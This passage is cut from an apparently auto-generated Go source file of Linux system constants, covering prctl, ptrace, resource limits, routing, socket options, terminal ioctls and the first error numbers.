PRIO_USER = 0x2
PROT_EXEC = 0x4
PROT_GROWSDOWN = 0x1000000
PROT_GROWSUP = 0x2000000
PROT_NONE = 0x0
PROT_READ = 0x1
PROT_WRITE = 0x2
PR_CAPBSET_DROP = 0x18
PR_CAPBSET_READ = 0x17
PR_CAP_AMBIENT = 0x2f
PR_CAP_AMBIENT_CLEAR_ALL = 0x4
PR_CAP_AMBIENT_IS_SET = 0x1
PR_CAP_AMBIENT_LOWER = 0x3
PR_CAP_AMBIENT_RAISE = 0x2
PR_ENDIAN_BIG = 0x0
PR_ENDIAN_LITTLE = 0x1
PR_ENDIAN_PPC_LITTLE = 0x2
PR_FPEMU_NOPRINT = 0x1
PR_FPEMU_SIGFPE = 0x2
PR_FP_EXC_ASYNC = 0x2
PR_FP_EXC_DISABLED = 0x0
PR_FP_EXC_DIV = 0x10000
PR_FP_EXC_INV = 0x100000
PR_FP_EXC_NONRECOV = 0x1
PR_FP_EXC_OVF = 0x20000
PR_FP_EXC_PRECISE = 0x3
PR_FP_EXC_RES = 0x80000
PR_FP_EXC_SW_ENABLE = 0x80
PR_FP_EXC_UND = 0x40000
PR_FP_MODE_FR = 0x1
PR_FP_MODE_FRE = 0x2
PR_GET_CHILD_SUBREAPER = 0x25
PR_GET_DUMPABLE = 0x3
PR_GET_ENDIAN = 0x13
PR_GET_FPEMU = 0x9
PR_GET_FPEXC = 0xb
PR_GET_FP_MODE = 0x2e
PR_GET_KEEPCAPS = 0x7
PR_GET_NAME = 0x10
PR_GET_NO_NEW_PRIVS = 0x27
PR_GET_PDEATHSIG = 0x2
PR_GET_SECCOMP = 0x15
PR_GET_SECUREBITS = 0x1b
PR_GET_THP_DISABLE = 0x2a
PR_GET_TID_ADDRESS = 0x28
PR_GET_TIMERSLACK = 0x1e
PR_GET_TIMING = 0xd
PR_GET_TSC = 0x19
PR_GET_UNALIGN = 0x5
PR_MCE_KILL = 0x21
PR_MCE_KILL_CLEAR = 0x0
PR_MCE_KILL_DEFAULT = 0x2
PR_MCE_KILL_EARLY = 0x1
PR_MCE_KILL_GET = 0x22
PR_MCE_KILL_LATE = 0x0
PR_MCE_KILL_SET = 0x1
PR_MPX_DISABLE_MANAGEMENT = 0x2c
PR_MPX_ENABLE_MANAGEMENT = 0x2b
PR_SET_CHILD_SUBREAPER = 0x24
PR_SET_DUMPABLE = 0x4
PR_SET_ENDIAN = 0x14
PR_SET_FPEMU = 0xa
PR_SET_FPEXC = 0xc
PR_SET_FP_MODE = 0x2d
PR_SET_KEEPCAPS = 0x8
PR_SET_MM = 0x23
PR_SET_MM_ARG_END = 0x9
PR_SET_MM_ARG_START = 0x8
PR_SET_MM_AUXV = 0xc
PR_SET_MM_BRK = 0x7
PR_SET_MM_END_CODE = 0x2
PR_SET_MM_END_DATA = 0x4
PR_SET_MM_ENV_END = 0xb
PR_SET_MM_ENV_START = 0xa
PR_SET_MM_EXE_FILE = 0xd
PR_SET_MM_MAP = 0xe
PR_SET_MM_MAP_SIZE = 0xf
PR_SET_MM_START_BRK = 0x6
PR_SET_MM_START_CODE = 0x1
PR_SET_MM_START_DATA = 0x3
PR_SET_MM_START_STACK = 0x5
PR_SET_NAME = 0xf
PR_SET_NO_NEW_PRIVS = 0x26
PR_SET_PDEATHSIG = 0x1
PR_SET_PTRACER = 0x59616d61
PR_SET_PTRACER_ANY = 0xffffffffffffffff
PR_SET_SECCOMP = 0x16
PR_SET_SECUREBITS = 0x1c
PR_SET_THP_DISABLE = 0x29
PR_SET_TIMERSLACK = 0x1d
PR_SET_TIMING = 0xe
PR_SET_TSC = 0x1a
PR_SET_UNALIGN = 0x6
PR_TASK_PERF_EVENTS_DISABLE = 0x1f
PR_TASK_PERF_EVENTS_ENABLE = 0x20
PR_TIMING_STATISTICAL = 0x0
PR_TIMING_TIMESTAMP = 0x1
PR_TSC_ENABLE = 0x1
PR_TSC_SIGSEGV = 0x2
PR_UNALIGN_NOPRINT = 0x1
PR_UNALIGN_SIGBUS = 0x2
PTRACE_ARCH_PRCTL = 0x1e
PTRACE_ATTACH = 0x10
PTRACE_CONT = 0x7
PTRACE_DETACH = 0x11
PTRACE_EVENT_CLONE = 0x3
PTRACE_EVENT_EXEC = 0x4
PTRACE_EVENT_EXIT = 0x6
PTRACE_EVENT_FORK = 0x1
PTRACE_EVENT_SECCOMP = 0x7
PTRACE_EVENT_STOP = 0x80
PTRACE_EVENT_VFORK = 0x2
PTRACE_EVENT_VFORK_DONE = 0x5
PTRACE_GETEVENTMSG = 0x4201
PTRACE_GETFPREGS = 0xe
PTRACE_GETFPXREGS = 0x12
PTRACE_GETREGS = 0xc
PTRACE_GETREGSET = 0x4204
PTRACE_GETSIGINFO = 0x4202
PTRACE_GETSIGMASK = 0x420a
PTRACE_GET_THREAD_AREA = 0x19
PTRACE_INTERRUPT = 0x4207
PTRACE_KILL = 0x8
PTRACE_LISTEN = 0x4208
PTRACE_OLDSETOPTIONS = 0x15
PTRACE_O_EXITKILL = 0x100000
PTRACE_O_MASK = 0x3000ff
PTRACE_O_SUSPEND_SECCOMP = 0x200000
PTRACE_O_TRACECLONE = 0x8
PTRACE_O_TRACEEXEC = 0x10
PTRACE_O_TRACEEXIT = 0x40
PTRACE_O_TRACEFORK = 0x2
PTRACE_O_TRACESECCOMP = 0x80
PTRACE_O_TRACESYSGOOD = 0x1
PTRACE_O_TRACEVFORK = 0x4
PTRACE_O_TRACEVFORKDONE = 0x20
PTRACE_PEEKDATA = 0x2
PTRACE_PEEKSIGINFO = 0x4209
PTRACE_PEEKSIGINFO_SHARED = 0x1
PTRACE_PEEKTEXT = 0x1
PTRACE_PEEKUSR = 0x3
PTRACE_POKEDATA = 0x5
PTRACE_POKETEXT = 0x4
PTRACE_POKEUSR = 0x6
PTRACE_SECCOMP_GET_FILTER = 0x420c
PTRACE_SEIZE = 0x4206
PTRACE_SETFPREGS = 0xf
PTRACE_SETFPXREGS = 0x13
PTRACE_SETOPTIONS = 0x4200
PTRACE_SETREGS = 0xd
PTRACE_SETREGSET = 0x4205
PTRACE_SETSIGINFO = 0x4203
PTRACE_SETSIGMASK = 0x420b
PTRACE_SET_THREAD_AREA = 0x1a
PTRACE_SINGLEBLOCK = 0x21
PTRACE_SINGLESTEP = 0x9
PTRACE_SYSCALL = 0x18
PTRACE_SYSEMU = 0x1f
PTRACE_SYSEMU_SINGLESTEP = 0x20
PTRACE_TRACEME = 0x0
RLIMIT_AS = 0x9
RLIMIT_CORE = 0x4
RLIMIT_CPU = 0x0
RLIMIT_DATA = 0x2
RLIMIT_FSIZE = 0x1
RLIMIT_LOCKS = 0xa
RLIMIT_MEMLOCK = 0x8
RLIMIT_MSGQUEUE = 0xc
RLIMIT_NICE = 0xd
RLIMIT_NOFILE = 0x7
RLIMIT_NPROC = 0x6
RLIMIT_RSS = 0x5
RLIMIT_RTPRIO = 0xe
RLIMIT_RTTIME = 0xf
RLIMIT_SIGPENDING = 0xb
RLIMIT_STACK = 0x3
RLIM_INFINITY = 0xffffffffffffffff
RTAX_ADVMSS = 0x8
RTAX_CC_ALGO = 0x10
RTAX_CWND = 0x7
RTAX_FEATURES = 0xc
RTAX_FEATURE_ALLFRAG = 0x8
RTAX_FEATURE_ECN = 0x1
RTAX_FEATURE_MASK = 0xf
RTAX_FEATURE_SACK = 0x2
RTAX_FEATURE_TIMESTAMP = 0x4
RTAX_HOPLIMIT = 0xa
RTAX_INITCWND = 0xb
RTAX_INITRWND = 0xe
RTAX_LOCK = 0x1
RTAX_MAX = 0x10
RTAX_MTU = 0x2
RTAX_QUICKACK = 0xf
RTAX_REORDERING = 0x9
RTAX_RTO_MIN = 0xd
RTAX_RTT = 0x4
RTAX_RTTVAR = 0x5
RTAX_SSTHRESH = 0x6
RTAX_UNSPEC = 0x0
RTAX_WINDOW = 0x3
RTA_ALIGNTO = 0x4
RTA_MAX = 0x1a
RTCF_DIRECTSRC = 0x4000000
RTCF_DOREDIRECT = 0x1000000
RTCF_LOG = 0x2000000
RTCF_MASQ = 0x400000
RTCF_NAT = 0x800000
RTCF_VALVE = 0x200000
RTF_ADDRCLASSMASK = 0xf8000000
RTF_ADDRCONF = 0x40000
RTF_ALLONLINK = 0x20000
RTF_BROADCAST = 0x10000000
RTF_CACHE = 0x1000000
RTF_DEFAULT = 0x10000
RTF_DYNAMIC = 0x10
RTF_FLOW = 0x2000000
RTF_GATEWAY = 0x2
RTF_HOST = 0x4
RTF_INTERFACE = 0x40000000
RTF_IRTT = 0x100
RTF_LINKRT = 0x100000
RTF_LOCAL = 0x80000000
RTF_MODIFIED = 0x20
RTF_MSS = 0x40
RTF_MTU = 0x40
RTF_MULTICAST = 0x20000000
RTF_NAT = 0x8000000
RTF_NOFORWARD = 0x1000
RTF_NONEXTHOP = 0x200000
RTF_NOPMTUDISC = 0x4000
RTF_POLICY = 0x4000000
RTF_REINSTATE = 0x8
RTF_REJECT = 0x200
RTF_STATIC = 0x400
RTF_THROW = 0x2000
RTF_UP = 0x1
RTF_WINDOW = 0x80
RTF_XRESOLVE = 0x800
RTM_BASE = 0x10
RTM_DELACTION = 0x31
RTM_DELADDR = 0x15
RTM_DELADDRLABEL = 0x49
RTM_DELLINK = 0x11
RTM_DELMDB = 0x55
RTM_DELNEIGH = 0x1d
RTM_DELNETCONF = 0x51
RTM_DELNSID = 0x59
RTM_DELQDISC = 0x25
RTM_DELROUTE = 0x19
RTM_DELRULE = 0x21
RTM_DELTCLASS = 0x29
RTM_DELTFILTER = 0x2d
RTM_F_CLONED = 0x200
RTM_F_EQUALIZE = 0x400
RTM_F_FIB_MATCH = 0x2000
RTM_F_LOOKUP_TABLE = 0x1000
RTM_F_NOTIFY = 0x100
RTM_F_PREFIX = 0x800
RTM_GETACTION = 0x32
RTM_GETADDR = 0x16
RTM_GETADDRLABEL = 0x4a
RTM_GETANYCAST = 0x3e
RTM_GETDCB = 0x4e
RTM_GETLINK = 0x12
RTM_GETMDB = 0x56
RTM_GETMULTICAST = 0x3a
RTM_GETNEIGH = 0x1e
RTM_GETNEIGHTBL = 0x42
RTM_GETNETCONF = 0x52
RTM_GETNSID = 0x5a
RTM_GETQDISC = 0x26
RTM_GETROUTE = 0x1a
RTM_GETRULE = 0x22
RTM_GETSTATS = 0x5e
RTM_GETTCLASS = 0x2a
RTM_GETTFILTER = 0x2e
RTM_MAX = 0x63
RTM_NEWACTION = 0x30
RTM_NEWADDR = 0x14
RTM_NEWADDRLABEL = 0x48
RTM_NEWCACHEREPORT = 0x60
RTM_NEWLINK = 0x10
RTM_NEWMDB = 0x54
RTM_NEWNDUSEROPT = 0x44
RTM_NEWNEIGH = 0x1c
RTM_NEWNEIGHTBL = 0x40
RTM_NEWNETCONF = 0x50
RTM_NEWNSID = 0x58
RTM_NEWPREFIX = 0x34
RTM_NEWQDISC = 0x24
RTM_NEWROUTE = 0x18
RTM_NEWRULE = 0x20
RTM_NEWSTATS = 0x5c
RTM_NEWTCLASS = 0x28
RTM_NEWTFILTER = 0x2c
RTM_NR_FAMILIES = 0x15
RTM_NR_MSGTYPES = 0x54
RTM_SETDCB = 0x4f
RTM_SETLINK = 0x13
RTM_SETNEIGHTBL = 0x43
RTNH_ALIGNTO = 0x4
RTNH_COMPARE_MASK = 0x19
RTNH_F_DEAD = 0x1
RTNH_F_LINKDOWN = 0x10
RTNH_F_OFFLOAD = 0x8
RTNH_F_ONLINK = 0x4
RTNH_F_PERVASIVE = 0x2
RTNH_F_UNRESOLVED = 0x20
RTN_MAX = 0xb
RTPROT_BABEL = 0x2a
RTPROT_BIRD = 0xc
RTPROT_BOOT = 0x3
RTPROT_DHCP = 0x10
RTPROT_DNROUTED = 0xd
RTPROT_GATED = 0x8
RTPROT_KERNEL = 0x2
RTPROT_MROUTED = 0x11
RTPROT_MRT = 0xa
RTPROT_NTK = 0xf
RTPROT_RA = 0x9
RTPROT_REDIRECT = 0x1
RTPROT_STATIC = 0x4
RTPROT_UNSPEC = 0x0
RTPROT_XORP = 0xe
RTPROT_ZEBRA = 0xb
RT_CLASS_DEFAULT = 0xfd
RT_CLASS_LOCAL = 0xff
RT_CLASS_MAIN = 0xfe
RT_CLASS_MAX = 0xff
RT_CLASS_UNSPEC = 0x0
RUSAGE_CHILDREN = -0x1
RUSAGE_SELF = 0x0
RUSAGE_THREAD = 0x1
SCM_CREDENTIALS = 0x2
SCM_RIGHTS = 0x1
SCM_TIMESTAMP = 0x1d
SCM_TIMESTAMPING = 0x25
SCM_TIMESTAMPING_OPT_STATS = 0x36
SCM_TIMESTAMPING_PKTINFO = 0x3a
SCM_TIMESTAMPNS = 0x23
SCM_WIFI_STATUS = 0x29
SECCOMP_MODE_DISABLED = 0x0
SECCOMP_MODE_FILTER = 0x2
SECCOMP_MODE_STRICT = 0x1
SHUT_RD = 0x0
SHUT_RDWR = 0x2
SHUT_WR = 0x1
SIOCADDDLCI = 0x8980
SIOCADDMULTI = 0x8931
SIOCADDRT = 0x890b
SIOCATMARK = 0x8905
SIOCBONDCHANGEACTIVE = 0x8995
SIOCBONDENSLAVE = 0x8990
SIOCBONDINFOQUERY = 0x8994
SIOCBONDRELEASE = 0x8991
SIOCBONDSETHWADDR = 0x8992
SIOCBONDSLAVEINFOQUERY = 0x8993
SIOCBRADDBR = 0x89a0
SIOCBRADDIF = 0x89a2
SIOCBRDELBR = 0x89a1
SIOCBRDELIF = 0x89a3
SIOCDARP = 0x8953
SIOCDELDLCI = 0x8981
SIOCDELMULTI = 0x8932
SIOCDELRT = 0x890c
SIOCDEVPRIVATE = 0x89f0
SIOCDIFADDR = 0x8936
SIOCDRARP = 0x8960
SIOCETHTOOL = 0x8946
SIOCGARP = 0x8954
SIOCGHWTSTAMP = 0x89b1
SIOCGIFADDR = 0x8915
SIOCGIFBR = 0x8940
SIOCGIFBRDADDR = 0x8919
SIOCGIFCONF = 0x8912
SIOCGIFCOUNT = 0x8938
SIOCGIFDSTADDR = 0x8917
SIOCGIFENCAP = 0x8925
SIOCGIFFLAGS = 0x8913
SIOCGIFHWADDR = 0x8927
SIOCGIFINDEX = 0x8933
SIOCGIFMAP = 0x8970
SIOCGIFMEM = 0x891f
SIOCGIFMETRIC = 0x891d
SIOCGIFMTU = 0x8921
SIOCGIFNAME = 0x8910
SIOCGIFNETMASK = 0x891b
SIOCGIFPFLAGS = 0x8935
SIOCGIFSLAVE = 0x8929
SIOCGIFTXQLEN = 0x8942
SIOCGIFVLAN = 0x8982
SIOCGMIIPHY = 0x8947
SIOCGMIIREG = 0x8948
SIOCGPGRP = 0x8904
SIOCGRARP = 0x8961
SIOCGSKNS = 0x894c
SIOCGSTAMP = 0x8906
SIOCGSTAMPNS = 0x8907
SIOCINQ = 0x541b
SIOCOUTQ = 0x5411
SIOCOUTQNSD = 0x894b
SIOCPROTOPRIVATE = 0x89e0
SIOCRTMSG = 0x890d
SIOCSARP = 0x8955
SIOCSHWTSTAMP = 0x89b0
SIOCSIFADDR = 0x8916
SIOCSIFBR = 0x8941
SIOCSIFBRDADDR = 0x891a
SIOCSIFDSTADDR = 0x8918
SIOCSIFENCAP = 0x8926
SIOCSIFFLAGS = 0x8914
SIOCSIFHWADDR = 0x8924
SIOCSIFHWBROADCAST = 0x8937
SIOCSIFLINK = 0x8911
SIOCSIFMAP = 0x8971
SIOCSIFMEM = 0x8920
SIOCSIFMETRIC = 0x891e
SIOCSIFMTU = 0x8922
SIOCSIFNAME = 0x8923
SIOCSIFNETMASK = 0x891c
SIOCSIFPFLAGS = 0x8934
SIOCSIFSLAVE = 0x8930
SIOCSIFTXQLEN = 0x8943
SIOCSIFVLAN = 0x8983
SIOCSMIIREG = 0x8949
SIOCSPGRP = 0x8902
SIOCSRARP = 0x8962
SIOCWANDEV = 0x894a
SOCK_CLOEXEC = 0x80000
SOCK_DCCP = 0x6
SOCK_DGRAM = 0x2
SOCK_IOC_TYPE = 0x89
SOCK_NONBLOCK = 0x800
SOCK_PACKET = 0xa
SOCK_RAW = 0x3
SOCK_RDM = 0x4
SOCK_SEQPACKET = 0x5
SOCK_STREAM = 0x1
SOL_AAL = 0x109
SOL_ALG = 0x117
SOL_ATM = 0x108
SOL_CAIF = 0x116
SOL_CAN_BASE = 0x64
SOL_DCCP = 0x10d
SOL_DECNET = 0x105
SOL_ICMPV6 = 0x3a
SOL_IP = 0x0
SOL_IPV6 = 0x29
SOL_IRDA = 0x10a
SOL_IUCV = 0x115
SOL_KCM = 0x119
SOL_LLC = 0x10c
SOL_NETBEUI = 0x10b
SOL_NETLINK = 0x10e
SOL_NFC = 0x118
SOL_PACKET = 0x107
SOL_PNPIPE = 0x113
SOL_PPPOL2TP = 0x111
SOL_RAW = 0xff
SOL_RDS = 0x114
SOL_RXRPC = 0x110
SOL_SOCKET = 0x1
SOL_TCP = 0x6
SOL_TIPC = 0x10f
SOL_X25 = 0x106
SOMAXCONN = 0x80
SO_ACCEPTCONN = 0x1e
SO_ATTACH_BPF = 0x32
SO_ATTACH_FILTER = 0x1a
SO_ATTACH_REUSEPORT_CBPF = 0x33
SO_ATTACH_REUSEPORT_EBPF = 0x34
SO_BINDTODEVICE = 0x19
SO_BPF_EXTENSIONS = 0x30
SO_BROADCAST = 0x6
SO_BSDCOMPAT = 0xe
SO_BUSY_POLL = 0x2e
SO_CNX_ADVICE = 0x35
SO_COOKIE = 0x39
SO_DEBUG = 0x1
SO_DETACH_BPF = 0x1b
SO_DETACH_FILTER = 0x1b
SO_DOMAIN = 0x27
SO_DONTROUTE = 0x5
SO_ERROR = 0x4
SO_GET_FILTER = 0x1a
SO_INCOMING_CPU = 0x31
SO_INCOMING_NAPI_ID = 0x38
SO_KEEPALIVE = 0x9
SO_LINGER = 0xd
SO_LOCK_FILTER = 0x2c
SO_MARK = 0x24
SO_MAX_PACING_RATE = 0x2f
SO_MEMINFO = 0x37
SO_NOFCS = 0x2b
SO_NO_CHECK = 0xb
SO_OOBINLINE = 0xa
SO_PASSCRED = 0x10
SO_PASSSEC = 0x22
SO_PEEK_OFF = 0x2a
SO_PEERCRED = 0x11
SO_PEERGROUPS = 0x3b
SO_PEERNAME = 0x1c
SO_PEERSEC = 0x1f
SO_PRIORITY = 0xc
SO_PROTOCOL = 0x26
SO_RCVBUF = 0x8
SO_RCVBUFFORCE = 0x21
SO_RCVLOWAT = 0x12
SO_RCVTIMEO = 0x14
SO_REUSEADDR = 0x2
SO_REUSEPORT = 0xf
SO_RXQ_OVFL = 0x28
SO_SECURITY_AUTHENTICATION = 0x16
SO_SECURITY_ENCRYPTION_NETWORK = 0x18
SO_SECURITY_ENCRYPTION_TRANSPORT = 0x17
SO_SELECT_ERR_QUEUE = 0x2d
SO_SNDBUF = 0x7
SO_SNDBUFFORCE = 0x20
SO_SNDLOWAT = 0x13
SO_SNDTIMEO = 0x15
SO_TIMESTAMP = 0x1d
SO_TIMESTAMPING = 0x25
SO_TIMESTAMPNS = 0x23
SO_TYPE = 0x3
SO_VM_SOCKETS_BUFFER_MAX_SIZE = 0x2
SO_VM_SOCKETS_BUFFER_MIN_SIZE = 0x1
SO_VM_SOCKETS_BUFFER_SIZE = 0x0
SO_VM_SOCKETS_CONNECT_TIMEOUT = 0x6
SO_VM_SOCKETS_NONBLOCK_TXRX = 0x7
SO_VM_SOCKETS_PEER_HOST_VM_ID = 0x3
SO_VM_SOCKETS_TRUSTED = 0x5
SO_WIFI_STATUS = 0x29
SPLICE_F_GIFT = 0x8
SPLICE_F_MORE = 0x4
SPLICE_F_MOVE = 0x1
SPLICE_F_NONBLOCK = 0x2
S_BLKSIZE = 0x200
S_IEXEC = 0x40
S_IFBLK = 0x6000
S_IFCHR = 0x2000
S_IFDIR = 0x4000
S_IFIFO = 0x1000
S_IFLNK = 0xa000
S_IFMT = 0xf000
S_IFREG = 0x8000
S_IFSOCK = 0xc000
S_IREAD = 0x100
S_IRGRP = 0x20
S_IROTH = 0x4
S_IRUSR = 0x100
S_IRWXG = 0x38
S_IRWXO = 0x7
S_IRWXU = 0x1c0
S_ISGID = 0x400
S_ISUID = 0x800
S_ISVTX = 0x200
S_IWGRP = 0x10
S_IWOTH = 0x2
S_IWRITE = 0x80
S_IWUSR = 0x80
S_IXGRP = 0x8
S_IXOTH = 0x1
S_IXUSR = 0x40
TAB0 = 0x0
TAB1 = 0x800
TAB2 = 0x1000
TAB3 = 0x1800
TABDLY = 0x1800
TASKSTATS_CMD_ATTR_MAX = 0x4
TASKSTATS_CMD_MAX = 0x2
TASKSTATS_GENL_NAME = "TASKSTATS"
TASKSTATS_GENL_VERSION = 0x1
TASKSTATS_TYPE_MAX = 0x6
TASKSTATS_VERSION = 0x8
TCFLSH = 0x540b
TCGETA = 0x5405
TCGETS = 0x5401
TCGETS2 = 0x802c542a
TCGETX = 0x5432
TCIFLUSH = 0x0
TCIOFF = 0x2
TCIOFLUSH = 0x2
TCION = 0x3
TCOFLUSH = 0x1
TCOOFF = 0x0
TCOON = 0x1
TCP_CC_INFO = 0x1a
TCP_CONGESTION = 0xd
TCP_COOKIE_IN_ALWAYS = 0x1
TCP_COOKIE_MAX = 0x10
TCP_COOKIE_MIN = 0x8
TCP_COOKIE_OUT_NEVER = 0x2
TCP_COOKIE_PAIR_SIZE = 0x20
TCP_COOKIE_TRANSACTIONS = 0xf
TCP_CORK = 0x3
TCP_DEFER_ACCEPT = 0x9
TCP_FASTOPEN = 0x17
TCP_FASTOPEN_CONNECT = 0x1e
TCP_INFO = 0xb
TCP_KEEPCNT = 0x6
TCP_KEEPIDLE = 0x4
TCP_KEEPINTVL = 0x5
TCP_LINGER2 = 0x8
TCP_MAXSEG = 0x2
TCP_MAXWIN = 0xffff
TCP_MAX_WINSHIFT = 0xe
TCP_MD5SIG = 0xe
TCP_MD5SIG_MAXKEYLEN = 0x50
TCP_MSS = 0x200
TCP_MSS_DEFAULT = 0x218
TCP_MSS_DESIRED = 0x4c4
TCP_NODELAY = 0x1
TCP_NOTSENT_LOWAT = 0x19
TCP_QUEUE_SEQ = 0x15
TCP_QUICKACK = 0xc
TCP_REPAIR = 0x13
TCP_REPAIR_OPTIONS = 0x16
TCP_REPAIR_QUEUE = 0x14
TCP_REPAIR_WINDOW = 0x1d
TCP_SAVED_SYN = 0x1c
TCP_SAVE_SYN = 0x1b
TCP_SYNCNT = 0x7
TCP_S_DATA_IN = 0x4
TCP_S_DATA_OUT = 0x8
TCP_THIN_DUPACK = 0x11
TCP_THIN_LINEAR_TIMEOUTS = 0x10
TCP_TIMESTAMP = 0x18
TCP_USER_TIMEOUT = 0x12
TCP_WINDOW_CLAMP = 0xa
TCSAFLUSH = 0x2
TCSBRK = 0x5409
TCSBRKP = 0x5425
TCSETA = 0x5406
TCSETAF = 0x5408
TCSETAW = 0x5407
TCSETS = 0x5402
TCSETS2 = 0x402c542b
TCSETSF = 0x5404
TCSETSF2 = 0x402c542d
TCSETSW = 0x5403
TCSETSW2 = 0x402c542c
TCSETX = 0x5433
TCSETXF = 0x5434
TCSETXW = 0x5435
TCXONC = 0x540a
TIOCCBRK = 0x5428
TIOCCONS = 0x541d
TIOCEXCL = 0x540c
TIOCGDEV = 0x80045432
TIOCGETD = 0x5424
TIOCGEXCL = 0x80045440
TIOCGICOUNT = 0x545d
TIOCGLCKTRMIOS = 0x5456
TIOCGPGRP = 0x540f
TIOCGPKT = 0x80045438
TIOCGPTLCK = 0x80045439
TIOCGPTN = 0x80045430
TIOCGPTPEER = 0x5441
TIOCGRS485 = 0x542e
TIOCGSERIAL = 0x541e
TIOCGSID = 0x5429
TIOCGSOFTCAR = 0x5419
TIOCGWINSZ = 0x5413
TIOCINQ = 0x541b
TIOCLINUX = 0x541c
TIOCMBIC = 0x5417
TIOCMBIS = 0x5416
TIOCMGET = 0x5415
TIOCMIWAIT = 0x545c
TIOCMSET = 0x5418
TIOCM_CAR = 0x40
TIOCM_CD = 0x40
TIOCM_CTS = 0x20
TIOCM_DSR = 0x100
TIOCM_DTR = 0x2
TIOCM_LE = 0x1
TIOCM_RI = 0x80
TIOCM_RNG = 0x80
TIOCM_RTS = 0x4
TIOCM_SR = 0x10
TIOCM_ST = 0x8
TIOCNOTTY = 0x5422
TIOCNXCL = 0x540d
TIOCOUTQ = 0x5411
TIOCPKT = 0x5420
TIOCPKT_DATA = 0x0
TIOCPKT_DOSTOP = 0x20
TIOCPKT_FLUSHREAD = 0x1
TIOCPKT_FLUSHWRITE = 0x2
TIOCPKT_IOCTL = 0x40
TIOCPKT_NOSTOP = 0x10
TIOCPKT_START = 0x8
TIOCPKT_STOP = 0x4
TIOCSBRK = 0x5427
TIOCSCTTY = 0x540e
TIOCSERCONFIG = 0x5453
TIOCSERGETLSR = 0x5459
TIOCSERGETMULTI = 0x545a
TIOCSERGSTRUCT = 0x5458
TIOCSERGWILD = 0x5454
TIOCSERSETMULTI = 0x545b
TIOCSERSWILD = 0x5455
TIOCSER_TEMT = 0x1
TIOCSETD = 0x5423
TIOCSIG = 0x40045436
TIOCSLCKTRMIOS = 0x5457
TIOCSPGRP = 0x5410
TIOCSPTLCK = 0x40045431
TIOCSRS485 = 0x542f
TIOCSSERIAL = 0x541f
TIOCSSOFTCAR = 0x541a
TIOCSTI = 0x5412
TIOCSWINSZ = 0x5414
TIOCVHANGUP = 0x5437
TOSTOP = 0x100
TS_COMM_LEN = 0x20
TUNATTACHFILTER = 0x401054d5
TUNDETACHFILTER = 0x401054d6
TUNGETFEATURES = 0x800454cf
TUNGETFILTER = 0x801054db
TUNGETIFF = 0x800454d2
TUNGETSNDBUF = 0x800454d3
TUNGETVNETBE = 0x800454df
TUNGETVNETHDRSZ = 0x800454d7
TUNGETVNETLE = 0x800454dd
TUNSETDEBUG = 0x400454c9
TUNSETGROUP = 0x400454ce
TUNSETIFF = 0x400454ca
TUNSETIFINDEX = 0x400454da
TUNSETLINK = 0x400454cd
TUNSETNOCSUM = 0x400454c8
TUNSETOFFLOAD = 0x400454d0
TUNSETOWNER = 0x400454cc
TUNSETPERSIST = 0x400454cb
TUNSETQUEUE = 0x400454d9
TUNSETSNDBUF = 0x400454d4
TUNSETTXFILTER = 0x400454d1
TUNSETVNETBE = 0x400454de
TUNSETVNETHDRSZ = 0x400454d8
TUNSETVNETLE = 0x400454dc
UMOUNT_NOFOLLOW = 0x8
UTIME_NOW = 0x3fffffff
UTIME_OMIT = 0x3ffffffe
VDISCARD = 0xd
VEOF = 0x4
VEOL = 0xb
VEOL2 = 0x10
VERASE = 0x2
VINTR = 0x0
VKILL = 0x3
VLNEXT = 0xf
VMADDR_CID_ANY = 0xffffffff
VMADDR_CID_HOST = 0x2
VMADDR_CID_HYPERVISOR = 0x0
VMADDR_CID_RESERVED = 0x1
VMADDR_PORT_ANY = 0xffffffff
VMIN = 0x6
VM_SOCKETS_INVALID_VERSION = 0xffffffff
VQUIT = 0x1
VREPRINT = 0xc
VSTART = 0x8
VSTOP = 0x9
VSUSP = 0xa
VSWTC = 0x7
VT0 = 0x0
VT1 = 0x4000
VTDLY = 0x4000
VTIME = 0x5
VWERASE = 0xe
WALL = 0x40000000
WCLONE = 0x80000000
WCONTINUED = 0x8
WDIOC_GETBOOTSTATUS = 0x80045702
WDIOC_GETPRETIMEOUT = 0x80045709
WDIOC_GETSTATUS = 0x80045701
WDIOC_GETSUPPORT = 0x80285700
WDIOC_GETTEMP = 0x80045703
WDIOC_GETTIMELEFT = 0x8004570a
WDIOC_GETTIMEOUT = 0x80045707
WDIOC_KEEPALIVE = 0x80045705
WDIOC_SETOPTIONS = 0x80045704
WDIOC_SETPRETIMEOUT = 0xc0045708
WDIOC_SETTIMEOUT = 0xc0045706
WEXITED = 0x4
WNOHANG = 0x1
WNOTHREAD = 0x20000000
WNOWAIT = 0x1000000
WORDSIZE = 0x40
WSTOPPED = 0x2
WUNTRACED = 0x2
XATTR_CREATE = 0x1
XATTR_REPLACE = 0x2
XCASE = 0x4
XTABS = 0x1800
)
// Errors
const (
E2BIG = syscall.Errno(0x7)
EACCES = syscall.Errno(0xd)
EADDRINUSE = syscall.Errno(0x62)
EADDRNOTAVAIL = syscall.Errno(0x63)
EADV = syscall.Errno(0x44)
EAFNOSUPPORT = syscall.Errno(0x61)
EAGAIN = syscall.Errno(0xb)
EALREADY = syscall.Errno(0x72)
EBADE = syscall.Errno(0x34)
EBADF = syscall.Errno(0x9)
EBADFD = syscall.Errno(0x4d)
EBADMSG = syscall.Errno(0x4a)
EBADR = syscall.Errno(0x35)
EBADRQC = syscall.Errno(0x38)
EBADSLT = syscall.Errno(0x39)
EBFONT = syscall.Errno(0x3b)
EBUSY = syscall.Errno(0x10)
ECANCELED = syscall.Errno(0x7d)
ECHILD = syscall.Errno(0xa)
ECHRNG = syscall.Errno(0x2c)
ECOMM = syscall.Errno(0x46)
ECONNABORTED = syscall.Errno(0x67)
ECONNREFUSED = syscall.Errno(0x6f)
ECONNRESET = syscall.Errno(0x68)
EDEADLK = syscall.Errno(0x23)
EDEADLOCK = syscall.Errno(0x23)
EDESTADDRREQ = syscall.Errno(0x59)
EDOM = syscall.Errno(0x21)
EDOTDOT = syscall.Errno(0x49)
EDQUOT = syscall.Errno(0x7a)
EEXIST = syscall.Errno(0x11)
EFAULT = syscall.Errno(0xe)
EFBIG = syscall.Errno(0x1b)
EHOSTDOWN = syscall.Errno(0x70)
EHOSTUNREACH = syscall.Errno(0x71)
EHWPOISON = syscall.Errno(0x85)
EIDRM = syscall.Errno(0x2b)
EILSEQ = syscall.Errno(0x54)
EINPROGRESS = syscall.Errno(0x73)
EINTR = syscall.Errno(0x4)
EINVAL = syscall.Errno(0x16)
EIO = syscall.Errno(0x5)
EISCONN = syscall.Errno(0x6a)
EISDIR = syscall.Errno(0x15)
EISNAM = syscall.Errno(0x78)
